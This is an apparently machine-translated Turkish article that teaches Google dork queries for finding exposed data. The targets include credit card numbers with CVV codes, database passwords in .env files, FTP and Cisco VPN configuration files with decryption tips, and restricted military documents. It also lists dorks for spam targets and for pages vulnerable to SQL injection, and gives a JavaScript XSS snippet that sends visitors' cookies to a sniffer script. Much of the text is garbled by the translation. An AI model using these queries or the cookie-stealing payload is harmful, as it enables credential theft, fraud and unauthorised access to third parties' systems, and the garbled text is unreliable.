GirişInurl Sanatçısı PHP ID'yi görüntüleyin. JSQL Enjeksiyonu Kullanma Talimatları - Kali Linux'taki SQL Enjeksiyonları için Çok Fonksiyonlu Aracı
Özel verileri elde etmek her zaman hack anlamına gelmez - bazen yayınlanırlar ortak erişim. Bilgi google Ayarları Ve küçük bir kutular, kredi kartı numaralarından FBI belgelerine çok ilginç bulmanıza izin verecek.
Uyarı
Tüm bilgiler yalnızca bilgilendirme amaçlıdır. Ne editörler ne de yazar, bu maddenin malzemelerinin neden olduğu herhangi bir zarardan sorumludur.Bugün, bugün internete bağlı, erişimin kısıtlanması hakkında biraz önem veriyor. Bu nedenle, birçok özel veri madencilik arama motorları olur. Robotlar - "örümcekler" artık web sayfaları ile sınırlı değildir ve ağdaki tüm içeriği indeksler ve bilgilerin ifşa etmesi amaçlanmayan veritabanlarına sürekli olarak eklenir. Sadece bu sırları tanıyorsun - sadece onlardan nasıl soracağını bilmeniz gerekiyor.
Dosya arıyoruz
Yetenekli ellerde, Google, ağda kötü bir şekilde yatan her şeyi hızlı bir şekilde bulur - örneğin, kişisel bilgi ve servis dosyaları. Genellikle halı altındaki anahtar olarak saklanırlar: erişim kısıtlaması yoktur, veriler sadece bağlantıların öne geçmediği sitenin arka bahçelerinde yatar. Standart Google Web Arabirimi sadece sağlar temel ayarlar Genişletilmiş arama, ancak onlar bile yeterli olacaktır.
İki operatörü kullanarak Google'da belirli bir türün dosyalarını aramayı sınırlandırın: filetype ve ext. İlk olarak, arama motorunun dosyanın başlığını tanımladığı formatı belirler, ikincisi, iç içeriğinden bağımsız olarak dosya uzantısıdır. Her iki durumda da ararken, yalnızca uzantıyı belirtmeniz gerekir. Başlangıçta, Ext ifadesi, dosya biçiminin spesifik özelliklerinin bulunmadığı durumlarda kullanımı kolaydı (örneğin, her şeyin içinde bulunabilecekleri konfigürasyon dosyalarını Ini ve CFG'yi aramak için). Şimdi Google algoritmaları değişti ve operatörler arasında görünür bir fark yoktur - çoğu durumda sonuçlar aynıdır.
Filtre Verme
Varsayılan olarak, kelimeler ve genel olarak girilen herhangi bir Google karakterleri, dizine alınmış sayfalardaki tüm dosyalar için aranır. Arama alanını etki alanı ile sınırlayabilirsiniz Üst düzey, Belirli bir site veya dosyalardaki istenen dizinin bulunduğu yerde. İlk iki seçenek için, Site ifadesi kullanılır, ardından alan adı veya seçili sitenin girildiği. Üçüncü durumda, bir bütün operatör seti, ofis alanlarında ve meta verilerinde bilgi aramanızı sağlar. Örneğin, Allinurl, gövdede belirtilen bağlantıları, allinanchor - etiketle donatılmış metinde silecek , Allinitle - Sayfaların başlıklarında, Allintext - Sayfaların gövdesinde.
Her operatör için, daha kısa bir adla hafif bir versiyon vardır (tüm konsol olmadan). Aradaki fark, Allinurl'in tüm kelimelerle bağlantıları sileceği ve Inurl'ın yalnızca bunlardan birinci ile olanıdır. Sorgudan ikinci ve sonraki kelimeler, herhangi bir yerde web sayfalarında oluşabilir. Inurl operatörü de benzer bir anlam - başka bir anlamdan farklılıklara sahiptir. İlk ayrıca, istenen belgeye (örneğin, / CGI-Bin /), bilinen güvenlik açıklarına sahip bileşenleri aramak için kullanılan istenen belgeye (örneğin / CGI-BIN /) herhangi bir karakter bulmanızı sağlar.
Hadi pratik yapalım. Alilintext filtresini alıyoruz ve talebin, geçerliliğinin yalnızca iki yıl içinde sona erecek (ya da tüm üst üste beslenmemekten yorulduğu zaman), kredi kartlarının sayı ve doğrulama kodları listesini veriyoruz.
Allintext: Kart Numarası Sona Erme Tarihi / 2017 CVV 
Genç hacker'ın "Pentagon veya NASA'nın sunucularını hacklediğini" okuduğunuzda, gizli bilgilere bakarken, çoğu durumda Google'ı kullanmak için böyle bir temel teknikle ilgilidir. NASA çalışanlarının listesine ve iletişim bilgilerinin listesine ilgi duyduğumuzu varsayalım. Kesinlikle böyle bir liste elektronik biçimdedir. Kolaylık sağlamak için veya ezici olarak, sitede yatar. Bu durumda, iç kullanım için tasarlandığından, bu durumda bağlantılar olmayacağı mantıklıdır. Böyle bir dosyada hangi kelimeler olabilir? En azından - "adres" alanı. Tüm bu varsayımların basit olduğundan daha kolay olup olmadığını kontrol edin.
İnurl: nasa.gov filetipe: xlsx "adres"
Bürokrasiyi kullanıyoruz
Benzer bulgular güzel bir şeydir. Gerçekten katı yakalamak, web yöneticileri, ağın kendisi ve istenen yapının özellikleri için Google operatörleri hakkında daha ayrıntılı bilgi sağlar. Ayrıntıları bilmek, ihraçmayı kolayca filtreleyebilir ve istenen dosyaların özelliklerini netleştirebilirsiniz, böylece geri kalanında gerçekten değerli veriler elde edebilirsiniz. Bürokrasinin kurtarmaya geldiği komik. Şansın yaslanmış bir gizli bilgiyi aramanın uygun olduğu tipik ifadeler yaratır.
Örneğin, ABD'de Savunma Bakanlığı'nda bir dağıtım beyanı zorunludur. Belge dağılımında standartlaştırılmış kısıtlamalar anlamına gelir. Litera, gizli bir halka açılış, gizli bir şey yoktur; B - Dahili kullanım için tasarlanan C, C, kesinlikle gizlidir ve daha sonra F. ayrı ayrı, özellikle en yüksek seviyedeki durum gizemini temsil eden değerli bilgileri belirleyen X harfine değmez. Bu tür belgelerin hizmetin borcu üzerinde yapılması gerekenleri aramıza izin verin ve Edebi C'li dosyalarla sınırlıyız. DODI 5230.24 Direktifine göre, bu işaretleme, ihracatın altına düşen kritik teknolojilerin açıklamasını içeren belgelere atanır. kontrol. ABD Ordusu için tahsis edilen üst düzey etki alanındaki sitelerle ilgili çok dikkatlice korunan bilgileri tespit edebilirsiniz.
"Dağıtım beyanı C" inurl: navy.mil 
ABD MO'su ve sözleşme organizasyonlarının yalnızca web sitelerinin Etki Alanı'nda toplanması çok uygundur. Bir etki alanı kısıtlaması arayışı son derece temiz ve başlıklar - kendilerini kendileri için konuşuyor. Bu şekilde arayın Rus sırları neredeyse işe yaramazdır: Chaos, Domains.ru'da hüküm sürüyor.
Herhangi bir belgeyi sitedeki herhangi bir belgeyi dikkatlice incelendir. Örneğin, "sn 2751" ihracat kısıtlamalarına referans, bu da ilginç teknik bilgileri aramak için uygundur. Zaman zaman, bir zamanlar aydınlattığı resmi sitelerden alınır, bu nedenle iade arayışı ilginç bir bağlantıyla devam etmeyi başaramazsa, Google Nakit (önbellek operatörü) veya Internet Arşivi sitesini kullanın.
Bulutlara tırmanıyoruz
Kesche Google'da yanlışlıkla yeniden dağıtılmış belgelerinin yanı sıra, bazen "özel" referansları oluşturan dropbox'tan ve diğer depolama hizmetlerinden, halka açık bir şekilde yayınlanan verilere referanslar. Alternatif ve ev yapımı hizmetlerle daha da kötüsü. Örneğin, bir sonraki sorgu, FTP sunucusunun yönlendiriciye yüklendiği tüm Verizon istemcilerinin verilerini bulur.
Allinurl: ftp: // verizon.net
Bu zeki insanlar şimdi kırk bin daha fazla buldular ve 2015 ilkbaharında daha büyük bir büyüklükteydi. Verizon.net yerine, herhangi bir ünlü sağlayıcının adını değiştirebilir ve ne bilineceğini, daha büyük olduğu bir yakalama olabilir. Dahili FTP sunucusu aracılığıyla, dosyalar yönlendiriciye bağlı harici sürücüde görünür. Genellikle uzak çalışma, kişisel bulut veya bazı pirleme sallanan sandalye için NAS'dır. Bu tür medyanın tüm içeriği Google ve diğer arama motorları tarafından dizine eklenir, böylece dış disklerde depolanan dosyalara doğrudan bağlantı ile erişebilirsiniz.
Yapılandırmaları casusluk yapıyoruz
Bulutlardan önce bulutlara göre, yeterli güvenlik açıkının da olduğu gibi basit FTP sunucuları, bulutlara uzak depo olarak da anlattı. Birçoğu şu ana kadar alakalı. Örneğin, popüler WS_FTP profesyonel program yapılandırma verileri, kullanıcı hesapları ve şifreleri WS_FTP.INI dosyasında saklanır. Tüm kayıtlar bir metin biçiminde depolandığından ve şifreler, asgari şaşkınlıktan sonra üçlü DES algoritması tarafından şifrelenirken bulmak ve okumak kolaydır. Çoğu sürümde, sadece ilk baytı atmak için yeterli.
Deşifre Bu tür şifreler, WS_FTP Şifre Decryptor Utility programını veya ücretsiz web servisini kullanarak kolaydır.
Keyfi bir siteyi hackle hakkında konuşma, genellikle CMS yapılandırma dosyalarının veya uygulamalarının günlükleri ve yedeklemelerinden bir şifre anlamına gelir. e-ticaret. Tipik yapılarını biliyorsanız, kolayca belirleyebilirsiniz. anahtar kelimeler. WS_FTP.INI'de karşılaşılanlar gibi satırlar son derece yaygındır. Örneğin, Drupal ve Prestashop'ta bir kullanıcı kimliği (UID) ve karşılık gelen şifre (PWD) ve dosya olan tüm bilgiler uzantılı tüm bilgiler depolanır. Onları aşağıdaki gibi ara:
"pwd \u003d" "uid \u003d" ext: inc
DBMS'den şifreleri ortaya çıkarın
SQL Server yapılandırması dosyalarında, ad ve adresler e-posta Kullanıcılar saklanır video aç, şifreler yerine, HISI MD5'leri kaydedilir. Onları deşifre etmek için, kesinlikle konuşurken, imkansızdır, ancak tanınmış buhar hash şifresi arasında uyum bulabilirsiniz.
Parola karma kullanmayan hala veritabanları var. Herhangi birinden yapılandırma dosyaları, tarayıcıda basitçe görüntülenebilir.
Intlext: DB_Password FileType: Env
Ortaya çıkan windows Sunucuları Yapılandırma dosyalarının yeri kısmen kayıt defterini işgal etti. Branşlarıyla arama, REG kullanarak bir dosya türü olarak aynı şekilde olabilir. Örneğin, şöyle:
Filetype: reg hkey_current_user "şifre" \u003d
Açıklığı unutma
Bazen almak kapalı bilgi Yanlışlıkla açık ve görüş alanında yardımı ile mümkündür. Google verileri. Mükemmel seçenek, herhangi bir ortak formatta şifreler listesi bulmaktır. Mağaza Hesabı Bilgileri metin dosyası, belge sözcüğü. veya elektronik excel masa Sadece çaresiz insanlar olabilir, ama yeterince onları.
FileType: XLS Inurl: Şifre
Bir yandan, bu tür olayları önlemek için bol miktarda araç vardır. Htaccess, Patt CMS için yeterli erişim hakları belirtmelisiniz, sol komut dosyalarını kullanmayın ve diğer delikleri kapatmayın. Ayrıca, Robots.txt istisna listesine sahip bir dosya da var, arama motorlarının içinde belirtilen dosyaları ve dizinleri endekslemesini yasaklayacak. Öte yandan, bazı sunuculardaki Robots.txt yapısı standarttan farklı ise, hemen üzerinde saklanmaya çalıştıkları açıkça anlaşılır.
Herhangi bir sitedeki dizinler ve dosyalar listesi standart yazıt endeksinden önce gelir. Hizmet amacıyla başlıkta buluşması gerektiğinden, intitle operatörünün aramasını sınırlamak mantıklıdır. İlginç şeyler dizinlerde / yönetici /, / kişisel /, / etc / ve hatta / sır / /.
Güncellemeleri takip edin
Alaka düzeyi burada çok önemlidir: Eski güvenlik açıkları çok yavaş yaklaşıyor, ancak Google ve onun arama sağlaması sürekli değişiyor. "Son ikinci" filtre arasında bile bir fark var (& TBS \u003d QDR: S Talebin sonunda) ve "Gerçek Zamanlı" (& TBS \u003d QDR: 1).
Zaman Aralığı Tarihi son Güncelleme Google dosyası da dolaylı olarak belirtilmiştir. Grafik web arayüzü sayesinde, standart periyotlardan birini (saat, gün, hafta vb.) Birini seçebilirsiniz veya tarih aralığını ayarlayabilirsiniz, ancak bu yöntem otomasyon için uygun değildir.
Görünüşte adres satırı Sadece TBS \u003d QDR kullanarak sonuçların çıktısını sınırlamanın yolunu tahmin edebilir:. Y harfi, bir yılın sınırını belirledikten sonra (& tbs \u003d qdr: y), m, son ayın sonuçlarını, W - haftası için, D - Geçtiğimiz gün, H - için son saat, N - dakikalık ve saniye başına. Sadece ünlü google haline gelen en taze sonuçlar filtre ve TBS \u003d QDR: 1 kullanıyor.
Bir kurnaz komut dosyası yazmak istiyorsanız, Tarih aralığının Google'da Derve Formatında Derve Formatında ayarlandığını bilmek faydalı olacaktır. Örneğin, burada bir liste bulabilirsiniz. pDF belgeleri Gizli kelimeyle 1 Ocak - 1 Temmuz 2015 tarihinden itibaren indirilir.
Gizli Filetype: PDF Dateranj: 2457024-2457205
Aralık, Kesirli kısmı dikkate almadan Julian Tarih formatında belirtilmiştir. Onları manuel olarak Gregoryen takviminden çevirir. Tarihler dönüştürücüsünü kullanmak daha kolaydır.
Hedefleme ve tekrar filtre
Arama sorgusunda ek operatörlerin belirlenmesinin yanı sıra, doğrudan bağlantı gövdesine gönderebilirsiniz. Örneğin, Filetype'ı açıklığa kavuşturma: PDF, As_FileType \u003d PDF tasarımına karşılık gelir. Böylece, herhangi bir açıklamayı ayarlamak uygundur. Sonuçların sadece Honduras Cumhuriyeti'nden çıkarılması, CR \u003d Countryn'ü arama URL'sine ve sadece Bobruisk şehrinden - GCS \u003d Bobruisk eklenerek verilir. Geliştirici bölümünde tam bir liste bulabilirsiniz.
Google Otomasyon aracı, ömrü kolaylaştırmak için tasarlanmıştır, ancak sıklıkla sorunlar ekler. Örneğin, kullanıcının IP ile WHOIS aracılığıyla şehri tarafından belirlenir. Google'daki bu bilgilere dayanarak, sunucular arasındaki yük sadece dengeli değil, aynı zamanda arama sonuçlarının sonuçlarını da değiştirir. Bölgeye bağlı olarak, aynı sorguda, farklı sonuçlar ilk sayfaya düşecek ve bazıları hiç gizli olabilir. Kozmopolit hissetmek ve herhangi bir ülkeden bilgi aramak, GL \u003d ülke direktifinden sonra iki harfli koduna yardımcı olacaktır. Örneğin, Hollanda'nın kodu - NL ve Google'daki Vatikan ve Kuzey Kore'ye izin verilmez.
Çoğu zaman, birkaç gelişmiş filtre kullandıktan sonra bile ihraç arayışı, hatta ortaya çıkıyor. Bu durumda, bunun için birkaç istisna ekleyerek isteği netleştirmek kolaydır (her biri eksi bir işaretidir). Örneğin, kişisel, bankacılık, isimler ve öğreticiye göre sıklıkla kullanılır. Bu nedenle, daha saf arama sonuçları, bir isteğin kıvrımlı bir örneği olmadığını, ancak rafine edilmesini gösterecektir:
Intitle: "/ Kişisel / Kişisel Endeksi /" - Adamlar -Tutorial -Banking
Bir örnek nihayet
Sofistike hacker, kendilerini kendi başına gerekli olan her şeyin sağlanmasıyla karakterizedir. Örneğin, VPN uygun bir şeydir, ancak pahalı veya geçici ve sınırlamalardır. Kendiniz için bir abonelik hazırlayın Biri çok pahalı. Grup abonelikleri olması iyidir ve Google'ın yardımıyla bazı grubun bir parçası olmak kolaydır. Bunu yapmak için, oldukça standart olmayan bir PCF uzantısına ve tanınabilir bir yola sahip olan Cisco VPN yapılandırma dosyasını bulmak yeterlidir: Program Dosyaları \\ Cisco Systems \\ VPN Client \\ Profilleri. Bir istek ve örneğin Bonn Üniversitesi'nin güler yüzlü bir ekibinde, örneğin girersiniz.
FileType: PCF VPN veya Grup
Bilgi.
Google bulur yapılandırma Dosyaları Şifrelerle, ancak birçoğu şifreli bir biçimde yazılmış veya karma ile değiştirilir. Sabit uzunluktaki satırları görürseniz, şifre çözme hizmeti hemen aranır.Şifreler şifreli bir formda saklanır, ancak Maurice Massar'ı şifre çözme için bir program yazmış ve Thecampusgeeks.com'dan ücretsiz olarak sunulmuştur.
İçin google Yardımı Yüzlerce yapılır farklı şekiller Saldırılar ve penetrasyon testleri. Popüler programları, ana veritabanı formatlarını, sayısız PHP güvenlik açıkını, bulutları vb. Etkileyen birçok seçenek vardır. Aradığınızdan eminseniz, gerekli bilgileri elde etmek için büyük ölçüde basitleştirir (özellikle evrensel mülkiyeti yapmayı planlamaması). Shodan tek tek ilginç fikirleri besler, ancak endeksli ağ kaynaklarının her tabanı!
Bizim için nasıl arama yapılır google.com
Hepsi muhtemelen böyle kullanmayı biliyor arama motoruGoogle gibi \u003d) ama herkes, özel tasarımların yardımıyla bir arama sorgusu yaparsanız, o zaman bu makalede çok daha verimli ve daha hızlı aradığınız şeyin sonuçlarını elde edebilirsiniz. doğru aramak için yapmanız gerekenler
Google, Google.com'u ararken özel bir anlamı olan çoklu genişletilmiş arama operatörünü destekler. Tipik olarak, bu operatörler aramayı değiştirir veya hatta Google'ı tamamen yapacak farklı şekiller Arama. Örneğin, tasarım bağlantı: bir Özel operatörve sorgu link: www.google.com. Size normal bir arama yapmaz, ancak Google.com'a bağlantıları olan tüm web sayfalarını bulacaktır.
Alternatif istek türleri
Önbellek: İsteğe bağlı olarak başka kelimeleri eklerseniz, Google, bu tür kelimeleri önbelleğe alınmış belgede vurgulayacaktır.
Örneğin, Önbellek: www.site web Önbelleğe alınmış içeriği vurgulanmış bir kelime "Web" ile gösterir.
bağlantı: Yukarıda kabul edilen arama sorgusu, belirtilen sorguya bağlantılar içeren web sayfalarını gösterir.
Örneğin: bağlantı: www.syt. Http: //www.site için bir bağlantının bulunduğu tüm sayfaları görüntüleyin
İlişkili: "Benzer" (ilgili) belirtilen web sayfası olan Web sayfalarını görüntüleyin.
Örneğin, İlgili: www.google.com. benzer web sayfalarını listeleyecek ana sayfa Google.
bilgi: Talep Bilgi: Google'ın istenen web sayfası hakkında olduğu bazı bilgileri sunacağım.
Örneğin, Bilgi: Site Forumumuz hakkında bilgi gösterir \u003d) (Armada - Forum ADALT Webmaster).
Diğer Bilgi İstekleri
tanımlamak: İstek tanımlama: Toplanan çeşitli ağ kaynaklarından elde ettikten sonra girdiğiniz kelimelerin tanımını sağlayacaktır. Tanım girilen tüm cümle için olacaktır (yani, tam sorgudaki tüm kelimeleri içerecektir).
hisse senetleri: Eğer stoklardan bir istek başlatırsanız: Google, sorgu zamanının geri kalanını Exchange raporlarının sembolleri olarak ele alacak ve sayfa gösteren sayfaya başvuracak. hazır bilgiler Bu karakterler için.
Örneğin, stoklar: Intel Yahoo Intel ve Yahoo hakkında bilgi göster. (Karakter yazdırmanız gerektiğini unutmayın. son Haberler, şirket adı değil)
Sorgu Değiştiricileri
site: Siteyi açarsanız: İsteğiniz sırasında Google bu etki alanında bulacak olan web sitelerinin sonuçlarını sınırlayacaktır.
Ayrıca bireysel bölgeleri bu gibi ru, org, com, vb. Site: com. site: ru.)
alyintitle: Alyintitle'dan bir istek işletiyorsanız:, Google sonuçları başlığın tüm kelimeler isteğiyle sınırlandırır.
Örneğin, allinitle: Google Arama Tüm Google sayfalarını görüntüler, blog, vb gibi arama yaparak döndürür.
İntitle: Eğer Intitle'ı açarsanız: İsteğiniz üzerine Google, kelimeyi içeren belgelerin sonuçlarını sınırlayacaktır.
Örneğin, İntitle: iş
allinurl: Allinurl'dan bir istek işletiyorsanız: Google, URL'deki tüm kelimelerle sonuçları sınırlayacaktır.
Örneğin, allinurl: Google Arama Google ile belgeleri döndürür ve başlıkta arama yapın. Ayrıca, bir seçenek olarak, Slash (/) kelimelerini paylaşabilirsiniz (/) Slash'in her iki tarafındaki kelimeler bir sayfada ayırt edilecektir: Örnek allinurl: Foo / Bar
inurl: Eğer inurl'ı açarsanız: İsteğiniz üzerine Google, URL'deki kelimeyi içeren belgelerin sonuçlarını sınırlayacaktır.
Örneğin, Animasyon Inurl: Site
intlext: Yalnızca sayfanın metninde, belirtilen kelime, referansın başlığını ve metinlerini görmezden gelir ve diğerleri ile ilgili değildir. Ayrıca bu değiştiricinin bir türevi var - allentext: şunlar. Ayrıca, istek içindeki tüm kelimeler sadece metinde, aynı zamanda önemli olan metinlerde, bağlantılardaki sık kullanılan kelimeleri görmezden gelir.
Örneğin, intlext: Forum
tarih aralığı: Geçici çerçeve ararları (DATERANGE: 2452389-2452389), zaman için tarihler Julian formatında belirtilmiştir.
Her türlü ilginç istek örnekleri
Google için sorgu örnekleri. Spam gönderenler için
İnurl: control.guest? A \u003d işareti
Site: Books.DreamBook.com "Ana sayfa URL" "İNŞTİRMEYİ" INURL: İmza
Site: www.freegb.net Ana Sayfa
Inurl: Sign.asp "Karakter Sayısı"
"Mesaj:" Inurl: Sign.cfm "Gönderen:"
İnurl: register.php "Kullanıcı Kayıt" "Web Sitesi"
Inurl: EDU / Ziyaretçi Defteri "Ziyaretçi defteri"
Inurl: "Mesaj Yorum" "URL" sonrası
Inurl: / Arşivler / "Yorumlar:" "Bilgi Hatırla?"
"Komut dosyası ve ziyaretçi defteri:" "URL:" "Yorumlar:"
İnurl:? Eylem \u003d "phpbook" "URL" ekleyin
Intitle: "Yeni Hikaye Gönder"
Dergiler
Inurl: www.livejournal.com/users/ mode \u003d Cevapla
İnurl greatestjournal.com/ mod \u003d cevap
İnurl: fastbb.ru/re.pl?
İnurl: fastbb.ru /re.pl? "Misafir defteri"
Bloglar
İnurl: blogger.com/comment.g? "Postid" "Anonim"
İnurl: typepad.com/ "Yorum yapın" "Kişisel Bilgileri Hatırla?"
İnurl: greatestjournal.com/community/ "Post Yorum" "Anonim posterlerin adresleri"
"Mesaj Yorum" "Anonim Posterlerin Adresleri" -
İntitle: "Yorum sonrası"
İnurl: pirillo.com "Post Yorum"
Forumlar
İnurl: gate.html? "NAME \u003d FORUM" "MODE \u003d Cevap"
İnurl: "Forum / Posting.php? Mode \u003d Cevapla"
İnurl: "mes.php?"
İnurl: "üye.html"
İnurl: forum / üye liste.php? "
Bilgi güvenliği hakkında biraz konuşmaya karar verdim. Makale, acemi programcılar için faydalı olacak ve önündeki gelişmeye yeni başlamaya başlayanlar. Sorun nedir?
Birçok acemi geliştiricisi, işlerinin güvenliğini tamamen unuttukları için kod yazmaktan çok düşkün. Ve en önemlisi - bu tür güvenlik açıklarını SQL isteği, xxs olarak unutun. Ve hatta idari panelleri için hafif şifreler icat eder ve Bruthfors'a tabi tutulur. Bu saldırılar nelerdir ve onlardan nasıl kaçınabilirim?
SQL Enjeksiyonu
SQL Enjeksiyon, belirli bir DBMS için bir SQL sorgusu ile gerçekleştirilen veritabanındaki en yaygın saldırı türüdür. Birçok insan bu tür saldırılardan ve hatta büyük şirketler. Neden - Bir veritabanı yazarken ve aslında SQL sorguları yazarken geliştirici hatası.
SQL sorgularında kullanılan giriş verilerinin yanlış işlenmesi nedeniyle SQL gömülü tip saldırısı mümkündür. Saldırının bir hacker tarafından başarılı bir şekilde geçişi ile, yalnızca veritabanlarının içeriğini değil, aynı zamanda sırasıyla şifreleri ve günlükleri de kaybediyorsunuz. İdari panel. Ve bu veriler siteye sahip olmaktan tamamen almak ya da ona geri dönüşümsüz ayarlamalar yapmak için yeterli olacaktır.
Saldırı, PHP, ASP, Perl ve diğer dillerde yazılmış komut dosyalarında başarıyla oynanabilir. Bu tür saldırıların başarısı daha fazlası, hangi DBMS'in kullanıldığı ve komut dosyasının kendisinin nasıl uygulandığına bağlıdır. Dünyada SQL Enjeksiyonları için çok fazla savunmasız bölge var. Bu emin olmak kolaydır. "Dorki" girmek için yeterlidir - bunlar savunmasız siteler arayışı için özel taleplerdir. İşte bunlardan bazıları:
- inurl: index.php? id \u003d
- inurl: eğitmenler.php? id \u003d
- inurl: Buy.php? Kategori \u003d
- inurl: makale.php? id \u003d
- inurl: play_old.php? id \u003d
- inurl: beyanname_more.php? decl_id \u003d
- inurl: pageid \u003d
- İnurl: oyunlar.php? İd \u003d
- inurl: Page.php? Dosya \u003d
- inurl: Newsdetail.php? id \u003d
- inurl: gallery.php? id \u003d
- inurl: makale.php? id \u003d
Onları nasıl kullanır? Sadece bunları Google veya Yandex arama motoruna girin. Arama motoru size sadece savunmasız bir site değil, aynı zamanda bu güvenlik açığı için bir sayfa verecektir. Ama durmayacağız ve sayfanın gerçekten savunmasız olduğundan emin olacağız. Bunun için, "'' '' 'nin tek bir teklifi koymak için" id \u003d 1 "değerinden sonra yeterli. Böyle bir şey:
- İnurl: oyunlar.php? İd \u003d 1 '
Ve site bize hakkında bir hata verecek sQL isteği. Hacker'a devam etmek için neye ihtiyacın var?
Ve sonra sayfaya en çok bağlantıya ihtiyacı var. Ardından, çoğu durumda güvenlik açığı üzerinde çalışın, bu bölümdeki yardımcı programlarıyla "Kali Linux" dağıtımında gerçekleşir: enjeksiyon kodunun tanıtılması ve gerekli işlemleri gerçekleştirin. Nasıl olacağı, sana söyleyemem. Ancak bu internette bilgi bulunabilir.
Xss saldırısı
Bu tür bir saldırı yapılır Çerezler Dosyaları. Bunlar, kullanıcıları kurtarmayı seviyorum. Neden olmasın? Onlar olmadan nasıl? Sonuçta, çerezler sayesinde, VK.com veya Mail.ru.Ru'dan yüzlerce kez bir şifre kullanmıyoruz. Ve onları reddedenlerin birkaçı. Ancak, bilgisayar korsanları için internette, kural sıklıkla ortaya çıkar: Kolaylık katsayısı, güvenli olmayan katsayılarla doğrudan orantılıdır.
XSS saldırısını uygulamak için Hacker'umuzun bilgiye ihtiyacı var JavaScript. İlk bakışta dil çok basit ve zararsızdır, çünkü bilgisayar kaynaklarına erişimi yoktur. Javascript Hacker ile çalışmak sadece tarayıcıda olabilir, ancak bu yeterlidir. Ne de olsa, kodu web sayfasına girmek için ana şey.
Saldırı süreci hakkında ayrıntılı olarak konuşmayacağım. Sadece temelleri ve nasıl olduğunun anlamını söyleyeceğim.
Hacker, bazı forumlara veya konuk defterine JS kodunu ekleyebilir:
Komut Dosyaları, kodun yürütüleceği enfekte sayfada bizi iletir: bir sniffer, herhangi bir depo veya peçete olun, aksi takdirde çerezlerimizi önbellekten kaçırır.
Neden JavaScript? Çünkü JavaScript, web istekleri ile mükemmel bir şekilde korunur ve çerezlere erişebilir. Ancak betiğimiz bizi bir siteye çevirirse, kullanıcı kolayca haberdar olacaktır. Burada, hacker daha kurnaz bir seçenek uygular - sadece kodu resmin içine girer.
İmg \u003d yeni resim ();
İmg.src \u003d "http://192.168.1.7/sniff.php?" + Kdocument.cookie;
Sadece bir resim oluştururuz ve betiğimize bir adres olarak ona nitelendiriyoruz.
Kendinizi tüm bunlardan nasıl korunur? Çok basit - şüpheli bağlantılara devam etmeyin.
DOS ve DDOS saldırıları
DOS (Eng'ten. Hizmetin Reddi - korunamaması) - Başarısızlığa yol açmak için bilgisayar sistemine hacker saldırısı. Bu, sistemin Bona Fide kullanıcılarının sağlananlara erişemediği bu tür koşulların oluşturulmasıdır. sistem Kaynakları (sunucular) veya bu erişim zordur. Freelancer'da kritik bilgi varsa, sistemin başarısızlığı, yakalamaya doğru bir adım olabilir: örneğin, bir sürüm, bölüm yazılım kodu vb. Ama çoğu zaman ekonomik basınç ölçüsüdür: gelire neden olan basit bir hizmet kaybıdır. Sağlayıcıdan gelen hesaplar veya bakım önlemleri maddi olarak "Hedefi" cebinde "hedefi" yendi. Şimdiki zamanda, DOS ve DDOS saldırıları en popülerdir, çünkü yasal olarak anlamlı kanıtlar bırakmamak için hemen hemen her sistemi arıza yapmanıza izin verirken.
DDOS saldırısından DOS arasındaki fark nedir?
DOS, akıllı bir yolla inşa edilen bir saldırıdır. Örneğin, sunucu gelen paketlerin doğruluğunu kontrol etmiyorsa, bilgisayar korsanı sonsuza kadar işlenecek bir istek yapabilir ve işlemci süresi diğer bağlantılarla çalışmak için yeterli olmayacaktır. Buna göre, müşteriler bakım yapmayı reddetmek. Ancak bu şekilde aşırı yüklenmek veya devre dışı bırakmak için, büyük ünlü yerler işe yaramaz. Oldukça geniş kanallara ve problemsiz olan ağır hizmet sunucusuyla bu tür aşırı yük ile başa çıkacaklardır.
DDOS aslında DOS olarak aynı saldırıdır. Ancak DOS bir istek paketinde ise, DDO'larda yüzlerce ve daha fazlasını yapabilirler. Ağır hizmet sunucuları bile bu aşırı yüklenme ile başa çıkamazlar. Bir örnek vereceğim.
DOS saldırısı, biriyle konuştuğunuzda, ancak burada bir tür halka açık kişi var ve yüksek sesle çığlık atmaya başlar. Ne konuşmak imkansız ya da çok zor. Çözüm: Sakinleşecek ve odadan bir insanı yönetecek güvenliğin neden olması. DDOS saldırıları - bu, bu tür yetmez insanların kalabalık bir kalabalığı olduğunda. Bu durumda, koruma hepsini bükemez ve önderlik etmeyecektir.
DOS ve DDOS, zombiler denilen bilgisayarlardan üretilir. Arabalarının herhangi bir sunucunun saldırısına dahil olmadığından şüphelenmeyen kullanıcıların hacker-hacker bilgisayarlarıdır.
Bunu bundan nasıl korunur? Genel olarak, hiçbir şey. Ancak hacker görevini zorlaştırabilirsiniz. Bunu yapmak için, seçmeniz gerekir İyi barındırma güçlü sunucularla.
Bruteforce saldırısı
Geliştirici, saldırılardan bir sürü koruma sistemi ile gelebilir, tamamen bizim tarafımızdan yazılmış komut dosyalarını getirebilir, siteyi kırılganlık, vb. Ama söz konusu olduğunda son adım Site kliapçileri, yani yönetici için bir şifre koymak kolay olduğunda, bir şeyi unutabilir. Parola!
Basit bir şifre kurmanız kesinlikle tavsiye edilmez. 12345, 1114457, Vasya111, vb. Olabilir. Şifreleri 10-11 karakterden daha az koymanız önerilmez. Aksi takdirde, en sıradan ve zor saldırıya maruz kalabilirsin - Bruthfors.
Brutfors kullanarak sözlükteki şifrenin bir saldırısıdır. Özel Programlar. Sözlükler farklı olabilir: Latin, sayılardaki büstü, herhangi bir aralığa, karışık (latice + sayıları) söyleyelim ve hatta benzersiz sembollerle olan sözlükler var @ # 4 $ ve * ~~ `'" \\? vb.
Tabii ki bu tür bir saldırı kaçınılması kolaydır. Artış sofistike şifre. Bir pimi bile tasarruf edebilirsiniz. Siteniz CMS'de yapılırsa bile, birçoğu benzer bir saldırı türü ve IP'yi bloke eder. Şifredeki daha farklı karakterleri her zaman hatırlamak için her zaman hatırlamak için gereklidir.
